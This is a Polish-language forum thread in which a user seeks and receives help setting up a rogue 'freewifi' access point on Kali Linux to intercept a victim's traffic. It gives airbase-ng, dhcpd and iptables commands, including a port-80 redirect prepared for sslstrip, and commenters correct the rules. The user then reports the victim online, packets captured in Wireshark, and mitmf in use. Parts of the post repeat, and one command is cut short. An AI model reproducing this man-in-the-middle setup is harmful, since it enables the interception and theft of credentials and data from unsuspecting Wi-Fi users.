#siecikomputerowe #sieci #hacking #kalilinux #linux #wifi #januszehackingu #scriptkiddie #it #informatyka #komputery #pcmasterrace Witam wszystkich. Poszukuję speca, który będzie potrafił rozwiązać mój problem lub wskaże forum w sieci gdzie takią pomoc znajdę. Chcę zrobić fake AP wifi na kalim przez adapter wifi TP-LINK(kali16.2 na vmplayerze) ruch ofiary chciałbym przekierować na kartę wifi hosta(w7), który ma bramę wyjściową na routerze cisco. Problem w tym, że po postawieniu dhcp i uruchomieniu ap, ofiara gdy łączy się z siecią nie ma dostępu do internetu, mimo że IP z DHCP zostaję przydzielone. Zamieszczam konfigurację z komentarzami. Pozdro
--------CONFIG DHCP
nano /etc/dhcp/dhcpd.conf my dhcpd.conf looks like:
@pabloAntonio: Po pierwsze nie rozumiem czemu zmieniasz MTU na 1400 - po co? Po drugie masz błędy w iptables - ta regułka nie jest prawidłowa : iptables -t nat -A PREROUTNG -p udp -j DNAT --to 192.168.0.1 Ona przekieruje całkowicie ruch UDP na 192.168.0.1 - a pytanie czy taki adres jest osiągalny, bo i czy na pewno chcesz cały ruch UDP przekierować a nie chodzi Ci tylko o DNS? Poza tym powinieneś przy PRE/POST routingach określić interfejs odpowiednio wyjściowy/wejściowy lub zakres
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT i rozwiązanie konfliktu mode monitora w /etc/NetworkManager/NetworkManager.conf ofiara ma już internet, a w wiresharku zaczęły pojawiać się pakiety
@FalseIdeas: @brokenik: Wszystko działa wystarczyło uruchomić DHCP z innymi parametrami a zamiast sslstripa uruchomić mitmf-a. Wydaję mi się że nie wiecie o co do końca mi chodziło...
@brokenik: wiedziałem, że tak napiszesz. Widzisz na początku nie wiedziałem do końca co oznaczają wszystkie polecenia, ale dokładnie wiedziałem co chciałem zrobić i dlatego zapytałem tutaj. Nawet na priv prosiłem Cię o pomoc i miałeś to w dupie. Teraz już wiem co oznacza każde polecenie i co najlepsze - wszystko dokładnie działa tak jak chciałem i rozwiązałem swój problem bez Twojej pomocy absolutnie Panie Wielki Znawco. Teraz jak czytam w
@pabloAntonio trujesz dupe na priv w srodku weekendu jakby ci ktos zabral dostep do google. Wklejasz bzdury i niewiele wiesz co wpisujesz. Koledzy wyzej moga to zweryfikowac. Zegnam.
Witam wszystkich. Poszukuję speca, który będzie potrafił rozwiązać mój problem lub wskaże forum w sieci gdzie takią pomoc znajdę.
Chcę zrobić fake AP wifi na kalim przez adapter wifi TP-LINK(kali16.2 na vmplayerze) ruch ofiary chciałbym przekierować na kartę wifi hosta(w7), który ma bramę wyjściową na routerze cisco. Problem w tym, że po postawieniu dhcp i uruchomieniu ap, ofiara gdy łączy się z siecią nie ma dostępu do internetu, mimo że IP z DHCP zostaję przydzielone. Zamieszczam konfigurację z komentarzami. Pozdro
--------CONFIG DHCP
nano /etc/dhcp/dhcpd.conf
my dhcpd.conf looks like:
authoritative;
default-lease-time 600;
max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name "freewifi";
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
---------MAKE FAKE AP---------
airmon-ng start wlan0
airmon-ng check kill //for avoid issues
airbase-ng -c 11 -e freewifi wlan0mon
-------REDIRECT TRAFFIC AND REDIRECT PORTS TO PREPARE SSLSTRIP USE------
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables -t nat --delete-chain
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTNG -p udp -j DNAT --to 192.168.0.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ifconfig at0 up
-----START DHCP-----
touch /var/lib/dhcp/dhcpd.leases //here i must touch database file manually
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf
Po drugie masz błędy w iptables - ta regułka nie jest prawidłowa :
iptables -t nat -A PREROUTNG -p udp -j DNAT --to 192.168.0.1
Ona przekieruje całkowicie ruch UDP na 192.168.0.1 - a pytanie czy taki adres jest osiągalny, bo i czy na pewno chcesz cały ruch UDP przekierować a nie chodzi Ci tylko o DNS?
Poza tym powinieneś przy PRE/POST routingach określić interfejs odpowiednio wyjściowy/wejściowy lub zakres
192.168.0.1 to adres gw
Byłbym bardzo wdzięczny gdybyś mógł bardziej przybliżyć jak powinno to wyglądać.
I wyczyść te reguły, bo połowa nie ma sensu, podobnie jak ten routing.
iptables -t filter -F
iptables -t
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
i rozwiązanie konfliktu mode monitora w /etc/NetworkManager/NetworkManager.conf
ofiara ma już internet, a w wiresharku zaczęły pojawiać się pakiety
Jak chcesz cos przekierowac na inny adres docelowy czy port to dodajesz regułkę DNAT albo REDIRECT w łańcuchu prerouting, np.
iptables -t nat -A PREROUTING -p tcp -s 192.168.1.0/24 --dport 80 -j REDIRECT --to-port 33333
iptables -t nat -A PREROUTING -p tcp -s 192.168.1.0/24 --dport 80 -j DNAT
Wszystko działa wystarczyło uruchomić DHCP z innymi parametrami a zamiast sslstripa uruchomić mitmf-a. Wydaję mi się że nie wiecie o co do końca mi chodziło...